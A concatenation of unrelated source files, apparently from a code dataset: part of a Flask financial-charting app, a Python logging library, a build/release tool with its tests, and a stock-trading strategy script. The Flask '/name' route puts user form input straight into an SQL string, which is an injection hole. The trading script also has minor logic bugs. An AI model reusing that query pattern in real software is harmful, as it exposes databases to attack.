time_serise.loc[time_serise[time_serise['data'] == 'nan'].index, ['data']] = 0
time_serise.loc[:, 'data'] = pd.to_numeric(time_serise['data'])
time_serise = time_serise.sort_values('date')
time_serise.dropna()
last_day = time_serise.loc[time_serise.index[-1], 'date']
origin_data = [
cls2[0],
list(time_serise['date']),
list(time_serise['data'])
]
last = float(time_serise.loc[time_serise.index[-1]]['data'])
mean = float(time_serise['data'].mean())
predict = last*0.5+mean*0.5
if cls=='银行':
predict_data.append({'name': str(cls2[0]),
'date': str(last_day).split(' ')[0],
'data': [round(predict*100,2)]})
else:
step = (last-mean)/7
predict = [round(i*step+last,2) for i in range(7)]
predict_data.append({'name': str(cls2[0]),
'date': str(last_day).split(' ')[0],
'data': predict})
legend.append(str(cls2[0]))
for i in list(time_serise['date']):
xAxis.add(i)
xAxis.add(last_day)
xAxis.add(datetime.timedelta(days=1) + last_day)
lines.append(origin_data)
xAxis = list(sorted(xAxis))
new_lines = []
for line in lines:
tmp_data = [None for _ in range(len(xAxis))]
for j in range(len(line[1])):
tmp_data[xAxis.index(line[1][j])] = line[2][j]
new_lines.append([line[0], [float(p) if p else 0. if p != None else None for p in tmp_data]])
xAxis = [str(i).split(' ')[0] for i in xAxis]
return render_template('home.html', lines=new_lines, dalei=dalei, names=names, char_name=name, legend=legend,
xAxis=xAxis, predict_data=predict_data,message=msg,warn=warn,tb_header=tb_header,colnames=colnames)
@app.route('/',methods=['POST','GET'])
def home():
msg = request.args.get('msg')
warn = request.args.get('warn')
if request.method=='GET':
db = DB_Connector()
db.curse.execute("select class1,name from mds_jinrong_day limit 1")
dt = db.curse.fetchone()
print(dt)
cls = dt[0]
name = dt[1]
return main(cls,name,msg,warn)
elif request.method=='POST':
cls = request.form.get('dalei')
name = request.form.get('name')
return main(cls,name,msg,warn)
@app.route('/name',methods=['POST'])
def name():
cls = request.form.get('class1')
db = DB_Connector()
db.curse.execute("select name from %s where class1='%s' group by name"%(db.table,cls))
names = sorted([str(i[0]) for i in db.curse.fetchall()])
# print(names)
return jsonify(names)
@app.route('/upload',methods=['POST'])
def upload():
# print(request.files)
csvs = request.files.getlist("file-multiple-input")
try:
db = DB_Connector()
for csv in csvs:
db.upload_csv(csv)
return redirect(url_for('home',msg='上传成功'))
except:
return redirect(url_for('home', warn='请检查数据!'))
if __name__ == '__main__':
app.run(URL,PORT)
``` |
{
"source": "132nd-etcher/elib_logging",
"score": 3
} |
#### File: elib_logging/elib_logging/configure.py
```python
import os
import sys
import typing
from elib_logging import exc, settings
def setup_logging(logger_name: str,
log_file_name: typing.Optional[str] = None,
log_dir: typing.Optional[str] = None,
log_format_console: typing.Optional[str] = None,
log_format_file: typing.Optional[str] = None,
backup_count: typing.Optional[int] = None,):
"""Configures elib_logging based on the current executable name"""
values = [
(f'{sys.executable}ELIB_LOGGING_LOGGER_NAME', logger_name),
(f'{sys.executable}ELIB_LOGGING_LOG_FILE_NAME', log_file_name or logger_name),
(f'{sys.executable}ELIB_LOGGING_LOG_DIR', log_dir or settings.DEFAULT_LOG_DIR),
(f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_CONSOLE', log_format_console or settings.DEFAULT_LOG_FORMAT_CONSOLE),
(f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_FILE', log_format_file or settings.DEFAULT_LOG_FORMAT_FILE),
(f'{sys.executable}ELIB_LOGGING_BACKUP_COUNT', backup_count or settings.DEFAULT_LOG_FILE_BACKUP_COUNT),
]
for val_name, val_value in values:
os.environ[val_name] = str(val_value)
def check_settings():
"""Raises LoggerNotSetupError if there are missing config values"""
values = [
f'{sys.executable}ELIB_LOGGING_LOGGER_NAME',
f'{sys.executable}ELIB_LOGGING_LOG_FILE_NAME',
f'{sys.executable}ELIB_LOGGING_LOG_DIR',
f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_CONSOLE',
f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_FILE',
f'{sys.executable}ELIB_LOGGING_BACKUP_COUNT',
]
for val in values:
if os.getenv(val) is None:
raise exc.LoggerNotSetupError(f'missing value: {val}')
```
#### File: elib_logging/elib_logging/settings.py
```python
import os
import sys
from elib_logging import exc
DEFAULT_LOG_DIR = './logs'
DEFAULT_LOG_FILE_BACKUP_COUNT = 7
DEFAULT_LOG_FORMAT_FILE = '%(relativeCreated)10d ms ' \
'%(processName)15s ' \
'%(threadName)15s ' \
'%(levelname)8s ' \
'%(name)s ' \
'[%(pathname)s@%(lineno)d %(funcName)s]: ' \
'%(message)s'
DEFAULT_LOG_FORMAT_CONSOLE = '%(relativeCreated)10d ms ' \
'%(levelname)8s: ' \
'%(message)s'
def _get_value(val_name) -> str:
sys_val_name = f'{sys.executable}{val_name}'
val_value = os.getenv(sys_val_name)
if val_value is None:
raise exc.LoggerNotSetupError(f'missing value: {val_name}')
return val_value
def logger_name() -> str:
"""Returns the main logger name"""
return _get_value('ELIB_LOGGING_LOGGER_NAME')
def log_file_name() -> str:
"""Returns the name of the base log file"""
return _get_value('ELIB_LOGGING_LOG_FILE_NAME')
def log_dir() -> str:
"""Returns the logs folder"""
return _get_value('ELIB_LOGGING_LOG_DIR')
def log_format_console() -> str:
"""Returns the format strings for console records"""
return _get_value('ELIB_LOGGING_LOG_FORMAT_CONSOLE')
def log_format_file() -> str:
"""Returns the format string for file records"""
return _get_value('ELIB_LOGGING_LOG_FORMAT_FILE')
def backup_count() -> str:
"""Returns the amount of log files to keep"""
return _get_value('ELIB_LOGGING_BACKUP_COUNT')
```
#### File: elib_logging/test/test_handlers.py
```python
import logging as base_logging
import sys
import time
import elib_logging.handlers
import elib_logging.logger
def test_handlers():
logger = elib_logging.logger.get_main_logger()
assert len(logger.handlers) == 2
for handler in logger.handlers:
assert isinstance(handler, (base_logging.FileHandler, base_logging.StreamHandler))
def test_get_handlers_with_formatter():
formatter = base_logging.Formatter()
handler = elib_logging.handlers.get_console_handler(formatter)
assert isinstance(handler, base_logging.StreamHandler)
handler = elib_logging.handlers.get_file_handler('test.log', formatter)
assert isinstance(handler, base_logging.FileHandler)
def test_queued_handler(logging_queue):
assert logging_queue.empty()
logger = elib_logging.logger.get_subprocess_logger(logging_queue, 'test_queued_handler')
assert logging_queue.empty()
logger.debug('test')
time.sleep(0.1)
assert not logging_queue.empty()
element = logging_queue.get()
assert isinstance(element, base_logging.LogRecord)
assert 'test' == element.msg
def test_frozen():
setattr(sys, 'frozen', True)
try:
logger = elib_logging.logger.get_logger()
for handler in logger.handlers:
if not isinstance(handler, base_logging.FileHandler):
assert handler.level == base_logging.INFO
finally:
delattr(sys, 'frozen')
def test_handler_level_not_frozen():
logger = elib_logging.logger.get_logger()
for handler in logger.handlers:
if not isinstance(handler, base_logging.FileHandler):
assert handler.level == base_logging.DEBUG
```
#### File: elib_logging/test/test_imports.py
```python
import glob
import pytest
@pytest.mark.nocleandir
@pytest.mark.parametrize('module_', glob.glob('./elib_logging/**/*.py', recursive=True))
def test_imports(module_):
module_ = module_[2:-3].replace('\\', '.')
__import__(module_)
@pytest.mark.nocleandir
@pytest.mark.parametrize('module_', list(glob.glob('./elib_logging/**/*.py', recursive=True)))
def test_imports_tests(module_):
module_ = module_[2:-3].replace('\\', '.')
__import__(module_)
``` |
{
"source": "132nd-etcher/epab",
"score": 2
} |
#### File: epab/cmd/_release.py
```python
import logging
import os
import shutil
import sys
from pathlib import Path
import click
import elib_run
import epab.cmd
import epab.linters
import epab.utils
from epab import __version__
from epab.core import CTX, config
LOGGER = logging.getLogger('EPAB')
def _clean():
"""
Cleans up build dir
"""
LOGGER.info('Cleaning project directory...')
folders_to_cleanup = [
'.eggs',
'build',
f'{config.PACKAGE_NAME()}.egg-info',
]
for folder in folders_to_cleanup:
if os.path.exists(folder):
LOGGER.info('\tremoving: %s', folder)
shutil.rmtree(folder)
def _copy_artifacts():
if config.ARTIFACTS():
folder = Path('./artifacts')
folder.mkdir(exist_ok=True)
for pattern in config.ARTIFACTS():
for artifact in Path('.').glob(pattern):
src = str(artifact.absolute())
dst = str(folder.absolute())
shutil.copy(src, dst)
LOGGER.info('copying artifact: %s', f'{src} -> {dst}')
def _check_dirty(reason: str):
LOGGER.info('checking repo')
if CTX.repo.is_dirty(untracked=True):
LOGGER.error('repository is dirty: %s', reason)
sys.exit(1)
def _remove_av_artifacts():
if CTX.appveyor:
LOGGER.info(f'running on APPVEYOR')
if Path('appveyor.yml').exists():
Path('appveyor.yml').unlink()
CTX.repo.checkout(os.getenv('APPVEYOR_REPO_BRANCH'))
def _print_build_info(current_branch: str, next_version: str):
info = [
f'Current EPAB version -> {__version__}',
f'Current branch -> {current_branch}',
f'Latest tag -> {CTX.repo.get_latest_tag()}',
f'Next version -> {next_version}',
]
LOGGER.info('build info: %s', ',\n'.join(info))
def _run_linters(ctx):
ctx.invoke(epab.linters.lint)
_check_dirty('linters produced artifacts')
LOGGER.info('linters OK')
def _run_tests(ctx):
ctx.invoke(epab.cmd.pytest, long=True)
LOGGER.info('tests OK')
def _create_wheel():
python_exe = sys.executable.replace('\\', '/')
elib_run.run(f'{python_exe} setup.py bdist_wheel')
LOGGER.info('setup OK')
def _upload_to_twine():
if config.UPLOAD_TO_TWINE():
elib_run.run(f'twine upload dist/* --skip-existing', mute=True)
LOGGER.info('twine OK')
def _update_av_build_name(next_version):
build_version = f'{next_version}-{os.getenv("APPVEYOR_BUILD_NUMBER")}-{os.getenv("APPVEYOR_REPO_COMMIT")}'
elib_run.run(f'appveyor UpdateBuild -Version {build_version}')
LOGGER.info('build version: %s', build_version)
def _set_release_description():
if CTX.appveyor:
# Check for empty extended commit message
_extended_commit_message = os.getenv('APPVEYOR_REPO_COMMIT_MESSAGE_EXTENDED')
if _extended_commit_message is not None:
epab.utils.AV.set_env_var('RELEASE_DESCRIPTION', f'"{_extended_commit_message}"')
os.putenv('RELEASE_DESCRIPTION', _extended_commit_message)
else:
epab.utils.AV.set_env_var('RELEASE_DESCRIPTION', '"No description"')
os.putenv('RELEASE_DESCRIPTION', 'No description')
@epab.utils.timeit
def _release(ctx: click.Context):
CTX.stash = False
_remove_av_artifacts()
_set_release_description()
current_branch = CTX.repo.get_current_branch()
next_version = epab.utils.get_next_version()
_print_build_info(current_branch, next_version)
_check_dirty('initial check failed')
LOGGER.info('running on commit: %s', CTX.repo.latest_commit())
_run_linters(ctx)
_run_tests(ctx)
if CTX.appveyor:
_copy_artifacts()
CTX.repo.tag(next_version, overwrite=True)
_clean()
_check_dirty('last check before build')
if config.MAKE_GRAPH():
ctx.invoke(epab.cmd.graph)
_create_wheel()
if current_branch == 'master':
_upload_to_twine()
if current_branch != 'master':
CTX.repo.push_tags()
if CTX.appveyor:
epab.utils.AV.set_env_var('EPAB_VERSION', next_version)
_update_av_build_name(next_version)
@click.command()
@click.pass_context
def release(ctx):
"""
Runs tests and creates:
- wheel binary distribution and pushes it to the cheese shop
- release tag and pushes it back to origin
"""
_release(ctx)
```
#### File: epab/core/config.py
```python
import logging
import pathlib
import elib_config
CHANGELOG_DISABLE = elib_config.ConfigValueBool(
'changelog', 'disable', description='Disable changelog building', default=False
)
CHANGELOG_FILE_PATH = elib_config.ConfigValuePath(
'changelog', 'file_path', description='Path to changelog file', default='CHANGELOG.md'
)
CHANGELOG_FILE_PATH.must_be_file()
TEST_RUNNER_OPTIONS = elib_config.ConfigValueString(
'test', 'runner_options', description='Additional options for test run', default=''
)
TEST_DURATION_COUNT = elib_config.ConfigValueInteger(
'test', 'duration_count', description='Amount of "slow" tests to show', default=10
)
TEST_DURATION_COUNT.set_limits(min_=0, max_=50)
TEST_TARGET = elib_config.ConfigValueString(
'test', 'target', description='Target of pytest', default='test'
)
TEST_COVERAGE_FAIL_UNDER = elib_config.ConfigValueInteger(
'test', 'coverage_fail_under', description='Minimal coverage to pass tests', default=20
)
TEST_COVERAGE_FAIL_UNDER.set_limits(min_=0, max_=100)
TEST_PYTEST_TIMEOUT = elib_config.ConfigValueInteger(
'test', 'timeout', description='Timeout in seconds for pytest runner', default=300
)
TEST_PYTEST_TIMEOUT.set_limits(min_=0, max_=3600)
LINT_LINE_LENGTH = elib_config.ConfigValueInteger(
'lint', 'line_length', description='Linter max line width', default=120
)
LINT_LINE_LENGTH.set_limits(min_=0, max_=500)
PACKAGE_NAME = elib_config.ConfigValueString(
'package_name', description='Package name'
)
FREEZE_ENTRY_POINT = elib_config.ConfigValueString(
'freeze', 'entry_point', description='Main entry point for pyinstaller', default=''
)
FREEZE_DATA_FILES = elib_config.ConfigValueList(
'freeze', 'data_files', description='PyInstaller data-files list', element_type=str, default=[]
)
DOC_REPO = elib_config.ConfigValueString(
'doc', 'repo', description='Documentation repository on Github', default=''
)
DOC_FOLDER = elib_config.ConfigValuePath(
'doc', 'folder', description='Local documentation directory', default='./doc'
)
DOC_FOLDER.must_be_dir()
QUIET = elib_config.ConfigValueBool(
'quiet', description='Less console output', default=False
)
VERBOSE = elib_config.ConfigValueBool(
'verbose', description='More console output', default=False
)
TEST_AV_RUNNER_OPTIONS = elib_config.ConfigValueString(
'appveyor', 'test_runner_options', description='Additional command line options for tests run on AV',
default='--long'
)
ARTIFACTS = elib_config.ConfigValueList(
'appveyor', 'artifacts', description='List of artifacts for Appveyor', element_type=str, default=[]
)
FLAKE8_EXCLUDE = elib_config.ConfigValueString(
'lint', 'flake8_exclude', description='List of comma separated files for flake8 to exclude', default=''
)
MYPY_ARGS = elib_config.ConfigValueString(
'lint', 'mypy_args', description='Additional MyPy arguments', default=''
)
QT_RES_SRC = elib_config.ConfigValueString(
'qt', 'res_src', description='Qt resource file (.qrc) location', default=''
)
QT_RES_TGT = elib_config.ConfigValueString(
'qt', 'res_tgt', description='Compiled Qt resource file (.py) target location', default=''
)
UPLOAD_TO_TWINE = elib_config.ConfigValueBool(
'twine', 'upload', description='Upload package to Twine after build',
default=True,
)
MAKE_GRAPH = elib_config.ConfigValueBool(
'graph', 'make',
description='Generate graphs using PyReverse',
default=True,
)
def setup_config(epab_version: str):
"""
Set up elib_config package
:param epab_version: installed version of EPAB as as string
"""
logger = logging.getLogger('EPAB')
logger.debug('setting up config')
elib_config.ELIBConfig.setup(
app_name='EPAB',
app_version=epab_version,
config_file_path='pyproject.toml',
config_sep_str='__',
root_path=['tool', 'epab']
)
elib_config.write_example_config('pyproject.toml.example')
if not pathlib.Path('pyproject.toml').exists():
raise FileNotFoundError('pyproject.toml')
elib_config.validate_config()
```
#### File: epab/utils/_ensure_exe.py
```python
import logging
import sys
import elib_run
LOGGER = logging.getLogger('EPAB')
def ensure_exe(exe_name: str, *paths: str): # pragma: no cover
"""
Makes sure that an executable can be found on the system path.
Will exit the program if the executable cannot be found
Args:
exe_name: name of the executable
paths: optional path(s) to be searched; if not specified, search the whole system
"""
if not elib_run.find_executable(exe_name, *paths):
LOGGER.error('could not find "%s.exe" on this system', exe_name)
sys.exit(-1)
```
#### File: test/test_cmd/test_freeze.py
```python
import datetime
from pathlib import Path
import elib_run
import pytest
from mockito import and_, contains, expect, mock, when
import epab.exc
import epab.utils
from epab.cmd import _freeze as freeze
from epab.cmd._freeze import _format_data_file, site_package
from epab.core import CTX, config
def test_freeze_cli(cli_runner):
when(freeze)._freeze('version')
cli_runner.invoke(freeze.freeze, ['version'])
def test_freeze():
config.FREEZE_ENTRY_POINT.default = 'test'
when(freeze)._install_pyinstaller()
when(freeze)._patch('version')
expect(elib_run).run('pipenv clean', failure_ok=True)
expect(elib_run).run(contains('pyinstaller --log-level=WARN'), timeout=300)
freeze._freeze('version')
def test_freeze_no_entry_point(caplog):
expect(freeze, times=0)._install_pyinstaller()
expect(freeze, times=0)._patch(...)
freeze._freeze('version')
assert 'no entry point defined, skipping freeze' in caplog.text
def test_patch():
repo = mock(spec=epab.utils.Repo)
CTX.repo = repo
now = datetime.datetime.utcnow()
timestamp = f'{now.year}{now.month}{now.day}{now.hour}{now.minute}'
package_name = config.PACKAGE_NAME()
when(repo).get_current_branch().thenReturn('branch')
when(repo).get_sha().thenReturn('sha')
when(elib_run).run(
'dummy.exe '
f'./dist/{package_name}.exe '
'/high version '
'/va /pv version '
f'/s desc {package_name} '
f'/s product {package_name} '
f'/s title {package_name} '
f'/s copyright {now.year}-etcher '
'/s company etcher '
'/s SpecialBuild version '
f'/s PrivateBuild version-branch_sha-{timestamp} '
'/langid 1033'
)
when(epab.utils).resource_path(...).thenReturn('dummy.exe')
freeze._patch('version')
def test_install_pyinstaller_installed():
expect(elib_run).run('pyinstaller --version').thenReturn(('version ', 0))
freeze._install_pyinstaller()
def test_install_pyinstaller_not_installed():
when(elib_run).run('pip install pyinstaller==3.4')
when(elib_run).run('pyinstaller --version') \
.thenRaise(elib_run.ExecutableNotFoundError('pyinstaller')) \
.thenReturn(('version', 0))
freeze._install_pyinstaller()
def test_clean_spec(cli_runner):
config.PACKAGE_NAME.default = 'test'
config.FREEZE_ENTRY_POINT.default = 'test'
spec_file = Path('test.spec')
spec_file.touch()
version = '0.1.0'
when(freeze)._freeze(version)
cli_runner.invoke(freeze.freeze, [version, '-c'])
assert not spec_file.exists()
def test_with_data_files():
config.FREEZE_ENTRY_POINT.default = 'test'
config.PACKAGE_NAME.default = 'test'
config.FREEZE_DATA_FILES.default = ['file1', 'file2']
when(freeze)._install_pyinstaller()
when(freeze)._patch('version')
expect(elib_run).run('pipenv clean', failure_ok=True)
expect(elib_run).run(and_(
contains('pyinstaller --log-level=WARN'),
contains('--add-data "file1"'),
contains('--add-data "file2"')), timeout=300)
freeze._freeze('version')
@pytest.mark.parametrize(
'data_file_src, expected',
[
('{site_package}/pytest.py', site_package() + '/pytest.py')
]
)
def test_format_data_file(data_file_src, expected):
actual = _format_data_file(data_file_src)
assert expected == actual
assert Path(actual).exists()
```
#### File: test/test_repo/conftest.py
```python
from pathlib import Path
import pytest
import epab.utils
class _CTX:
obj = {'dry_run': False}
def pytest_collection_modifyitems(items):
for item in items:
if 'test_repo/' in item.nodeid:
item.add_marker(pytest.mark.long)
@pytest.fixture()
def repo(dummy_git_repo):
dummy_git_repo.create()
_repo = epab.utils.Repo()
yield _repo
@pytest.fixture(params=[[f'DUMMY_FILE_{x}' for x in range(5)] for _ in range(1)])
def file_set(request):
file_set_ = list(map(Path, request.param))
for file in file_set_:
file.touch()
yield file_set_
```
#### File: test/test_repo/test_merge.py
```python
from pathlib import Path
import pytest
def test_merge(repo):
repo.create_branch_and_checkout('develop')
Path('test').touch()
repo.commit('test')
sha = repo.get_sha()
short_sha = repo.get_short_sha()
repo.checkout('master')
repo.merge('develop')
assert sha == repo.get_sha()
assert short_sha == repo.get_short_sha()
def test_merge_dry_run(repo):
repo.create_branch_and_checkout('develop')
Path('test').touch()
repo.commit('test')
sha = repo.get_sha()
repo.checkout('master')
def test_merge_dirty(repo):
Path('test').write_text('clean')
assert 'test' in repo.untracked_files()
repo.commit('test')
repo.create_branch_and_checkout('develop')
repo.checkout('master')
Path('test').write_text('dirty')
with pytest.raises(SystemExit):
repo.merge('develop')
```
#### File: test_utils/test_next_version/conftest.py
```python
import time
import typing
from pathlib import Path
import pytest
import epab.utils
from epab.core import CTX
UML_DIR = Path('./test/uml').absolute()
UML_DIR.mkdir(exist_ok=True)
class Repo(epab.utils.Repo):
def __init__(self):
epab.utils.Repo.__init__(self)
self.uml = ['@startuml']
def commit(
self,
message: str,
files_to_add: typing.Optional[typing.Union[typing.List[str], str]] = None,
allow_empty: bool = False,
):
super(Repo, self).commit(message, files_to_add, allow_empty)
self.uml.append(f'{self.get_current_branch()} -> {self.get_current_branch()}: commit')
def merge(self, ref_name: str):
super(Repo, self).merge(ref_name)
self.uml.append(f'{ref_name} ->o {self.get_current_branch()}: merge')
def checkout(self, reference):
init_branch = self.get_current_branch()
super(Repo, self).checkout(reference)
self.uml.append(f'{init_branch} ->> {reference}: checkout')
def create_branch_and_checkout(self, branch_name):
self.create_branch(branch_name)
self.checkout(branch_name)
if CTX.appveyor:
time.sleep(1)
else:
time.sleep(0.1)
def tag(self, tag: str, overwrite: bool = False):
if tag is None:
tag = epab.utils.get_next_version()
branch = self.get_current_branch()
self.uml.append(f'{branch} --> {branch}: TAG: {tag}')
# self.uml.append(f'ref over {branch}: {tag}')
super(Repo, self).tag(tag, overwrite)
def mark(self, text: str):
self.uml.append(f'ref over {self.get_current_branch()}: {text}')
# noinspection PyTypeChecker
@pytest.fixture(name='repo')
def _git_repo(request, dummy_git_repo, monkeypatch):
test_name = request.node.name
# noinspection SpellCheckingInspection
uml = [
'@startuml',
f'title {test_name}',
'skinparam ParticipantPadding 20',
'skinparam BoxPadding 10',
'participant master'
]
try:
monkeypatch.delenv('TEAMCITY_VERSION')
except KeyError:
pass
dummy_git_repo.create()
repo = Repo()
CTX.repo = repo
yield repo
uml.extend(repo.uml)
# noinspection SpellCheckingInspection
uml.append('@enduml')
uml = [x.replace('/', '.') for x in uml]
# noinspection SpellCheckingInspection
Path(UML_DIR, test_name + '.puml').write_text('\n'.join(uml))
```
#### File: test_utils/test_next_version/test_calver.py
```python
import pytest
from hypothesis import given, strategies as st
from mockito import mock, verifyStubbedInvocationsAreUsed, when
from epab.utils import _next_version as nv
@pytest.mark.long
@given(
year=st.integers(min_value=1950, max_value=8000),
month=st.integers(min_value=1, max_value=12),
day=st.integers(min_value=1, max_value=31)
)
def test_calver(year, month, day):
now = mock()
now.year = year
now.month = month
now.day = day
when(nv)._get_datetime().thenReturn(now)
assert nv._get_calver() == f'{year}.{month:02d}.{day:02d}'
verifyStubbedInvocationsAreUsed()
```
#### File: test_utils/test_next_version/test_get_next_version.py
```python
import pytest
from mockito import verifyStubbedInvocationsAreUsed, when
from epab.utils import _next_version, get_next_version
CALVER = '2018.1.2'
@pytest.fixture(autouse=True)
def _mock_calver():
when(_next_version)._get_calver().thenReturn(CALVER)
yield
verifyStubbedInvocationsAreUsed()
def _check_next_version(repo, expected_version):
next_version = get_next_version()
assert expected_version == next_version
repo.mark(f'calver: {CALVER}')
repo.mark(f'next version: {next_version}')
def test_next_version_empty_repo(repo):
assert not repo.list_tags()
assert repo.get_current_branch() == 'master'
_check_next_version(repo, f'{CALVER}.1')
def test_next_version_stable(repo):
assert repo.get_current_branch() == 'master'
repo.tag(f'{CALVER}.1')
_check_next_version(repo, f'{CALVER}.2')
def test_next_version_stable_older_calver(repo):
assert repo.get_current_branch() == 'master'
repo.tag(f'2018.1.1.1')
repo.tag(f'2018.1.1.2')
_check_next_version(repo, f'{CALVER}.1')
@pytest.mark.long
def test_next_version_alpha_empty_repo(repo):
assert repo.get_current_branch() == 'master'
repo.create_branch_and_checkout('test')
_check_next_version(repo, f'{CALVER}.1a1+test')
@pytest.mark.long
def test_next_version_alpha(repo):
assert repo.get_current_branch() == 'master'
repo.tag('2018.1.1.1')
repo.tag('2018.1.1.2')
_check_next_version(repo, f'{CALVER}.1')
repo.tag(f'{CALVER}.1')
repo.create_branch_and_checkout('test')
repo.tag(f'{CALVER}.2a1+test')
repo.tag(f'{CALVER}.2a2+test')
_check_next_version(repo, f'{CALVER}.2a3+test')
repo.checkout('master')
_check_next_version(repo, f'{CALVER}.2')
``` |
{
"source": "1332927388/-",
"score": 2
} |
#### File: -/src/xiyanghong.py
```python
from iFinDPy import *
import datetime as dt
import time
import datetime
import pandas as pd
import statsmodels.api as sm
import numpy as np
import talib
def initialize(account):
account.a_periods=10 # 持有日期上限
account.b_periods=3 # 持有日期上限
account.hold={} # 记录持有天数情况
account.holdSl=[] # 记录短期波段的持有情况
account.holdHb=[] # 记录超短追涨的持有情况
account.security = '000016.SH' # 大盘风控使用上证指数
account.maxStock=20 # 每日最多选择出来的股票数量
account.defend=False # 大盘风控值
account.N = 20 # 取前 N 日的数据
account.M = 400 # RSRS 指标 M 变量
#account.execPoint=['1000','1015','1030','1045','1100','1115','1129','1400','1415','1430','1445','1456'] #卖点判断时刻
account.execPoint=['1000','1030','1100','1129','1400','1430','1456'] #卖点判断时刻
# 短期波段策略的选股条件
condition_sl='''
股本规模是大盘股,
股票简称不包含 st,
市盈率(pe)>0 倍,
boll<收盘价,
非新股,
非停牌
'''
# 超短追涨的选股条件
condition_hb='''
股本规模不是大盘股,
昨天涨停,
非新股,
股票简称不包含 st,
boll<收盘价,
非停牌
'''
# 获取 wencai 的数据,并用不同字段记录
# sl:短线波段
get_iwencai(condition_sl,"sl")
# hb:超短追涨
get_iwencai(condition_hb,"hb")
run_daily(func=dayPart, time_rule='after_open', hours=0, minutes=1)
return
# 盘前处理函数
def before_trading_start(account,data):
# 风险判断
account.defend=secureRatio_d(account,data)
#account.defend=False
if account.defend==True:
log.info("日级风控平仓")
#account.defend=5
# 数据整理
account.hb=pd.DataFrame(
{
"symbol":account.hb,
"buypoint":np.zeros(len(account.hb)),
"market":np.zeros(len(account.hb)),
"kdj":np.zeros(len(account.hb)),
"order_id":np.zeros(len(account.hb))
})
return
def handle_data(account,data):
# 在 execPoint 进行打板策略风控和售出
if get_time() in account.execPoint and account.defend==False:
if secureRatio_m(account,data)==True:
pourAll(account)
else:
for stock in account.holdHb:
b_sellCheck(stock,data,account)
return
def dayPart(account,data):
# 大盘风控
if account.defend==True:
#平仓
pourAll(account)
else:
delayCheck(data,account)
if getTend(account,trade_signal(account,data))==True:
#pourB(account)
log.info("偏好大盘")
#大盘,执行 A 策略
# 9:30 调用每日短线波段操作函数
for stock in account.sl:
a_buyCheck(stock,account)
# 卖出符合条件的 A
a_sellCheck(account,data)
# 风险控制
a_riskDefend(account)
else:
#pourA(account)
log.info("偏好小盘")
#执行 B 策略
#前日风控
for stock in account.holdHb:
if b_prevRiskDefend(stock,data)==True and stock in account.hold:
order(stock,0,style="MarketOrder")
log.info("超短前日风控卖出"+stock)
account.holdHb.pop(dictLoc(account.holdHb,stock))
account.hold.pop(stock)
#处理集合竞价
for i in range(len(account.hb)):
account.hb.ix[i,'buypoint']=b_buyCheck(account.hb.ix[i,'symbol'],data)
account.hb.ix[i,'market']=b_getMarket(account.hb.ix[i,'symbol'])
account.hb.ix[i,'kdj']=b_getKDJ(account.hb.ix[i,'symbol'])
#account.hb=account.hb[account.hb.market<=8000000000]
account.hb=account.hb.sort_values(by=['buypoint','kdj'],ascending=[False,True])
account.hb=account.hb[0:min(5,len(account.hb))]
# 购入高优先级股票
for i in account.hb.index:
if account.hb.ix[i,'buypoint']==1 and len(account.holdHb)<15 and account.hb.ix[i,'symbol'] not in account.holdHb:
atr = getATR(account.hb.ix[i,'symbol'])
if not isNaN(atr[-1]):
#amount = min(1200000,int(account.cash/(atr[-1]*20)))
stock = account.hb.ix[i,'symbol']
log.info("超短高优先买入"+stock)
trade_value(stock,min(1000000,500000*atr[-1]))
account.holdHb.append(account.hb.ix[i,'symbol'])
# 购入低优先级股票
for i in account.hb.index :
if account.hb.ix[i,'buypoint']==0 and len(account.holdHb)<15 and account.hb.ix[i,'symbol'] not in account.holdHb:
atr = getATR(account.hb.ix[i,'symbol'])
if not isNaN(atr[-1]):
#amount = int(account.cash/(atr[-1]*20))
trade_value(account.hb.ix[i,'symbol'],min(1000000,500000*atr[-1]))
log.info("超短低优先买入"+account.hb.ix[i,'symbol'])
account.holdHb.append(account.hb.ix[i,'symbol'])
return
# 盘后处理函数
def after_trading_end(account, data):
# 持股时间增加
for stock in list(account.positions):
if stock not in account.hold:
account.hold[stock] = 0
else:
account.hold[stock] += 1
for stock in account.hold:
if stock not in list(account.positions):
account.hold.pop(stock)
for stock in account.holdHb:
if stock not in list(account.positions):
account.holdHb.remove(stock)
for stock in account.holdSl:
if stock not in list(account.positions):
account.holdSl.remove(stock)
return
# =======================
# 公共函数(util)
# --------------------------------------
# 交易统一用交易函数,包含了撤单功能
def trade_target(stock,aim):
# 交易到目标股数
id=order_target(stock,aim)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
return
def trade_value(stock,value):
# 交易目标金额
id=order_value(stock,value)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
return id
def trade_amount(stock,amount):
# 交易目标数量
id=order(stock,amount)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
return
def secureRatio_d(account,data):
close = history('000001.SH', ['close'], 20, '1d', False, 'pre').iloc[:,0]
MA5 = talib.MA(np.array(close), timeperiod=5)
if((MA5[-1]<MA5[-2])and(MA5[-2]<MA5[-3])):
#if MA5[-1]<MA5[-2]:
return True
else:
return False
def secureRatio_m(account,data):
q_rate = history('000001.SH', ['quote_rate'], 20, '1m', False, 'pre')['quote_rate']
if(len(q_rate)<1 or q_rate[-1]<-0.8):
return True
else:
close = history('000001.SH', ['close'], 20, '30m', False, 'pre').iloc[:,0]
MA5 = talib.MA(np.array(close), timeperiod=5)
#if((MA5[-1]<MA5[-2])and(MA5[-2]<MA5[-3])):
if (MA5[-1]<MA5[-2]):
return True
else:
return False
# 判断是否是 Nan
def isNaN(params):
return params!=params
# 清仓单只股票
# 这里还是考虑了所有股票的
def pourStock(stock,account):
trade_target(stock,0)
if stock in account.hold:
account.hold.pop(stock)
if stock in account.holdHb:
account.holdSl.remove(stock)
if stock in account.holdHb:
account.holdHb.remove(stock)
# 清仓全部股票
# 由于当日买入的不能进行出手,所以从 account.hold 里面选择股票
def pourA(account):
temp=[]
for i in account.holdSl:
stock=account.positions[i].symbol
trade_target(stock,0)
temp.append(stock)
account.hold={}
account.holdSl=list(set(account.holdSl) ^ set(temp))
return
def pourB(account):
temp=[]
for i in account.holdHb:
stock=account.positions[i].symbol
trade_target(stock,0)
temp.append(stock)
account.hold={}
account.holdHb=list(set(account.holdHb) ^ set(temp))
return
def pourAll(account):
temp=[]
for i in account.hold:
stock=account.positions[i].symbol
trade_target(stock,0)
temp.append(stock)
account.hold={}
account.holdSl=list(set(account.holdSl) ^ set(temp))
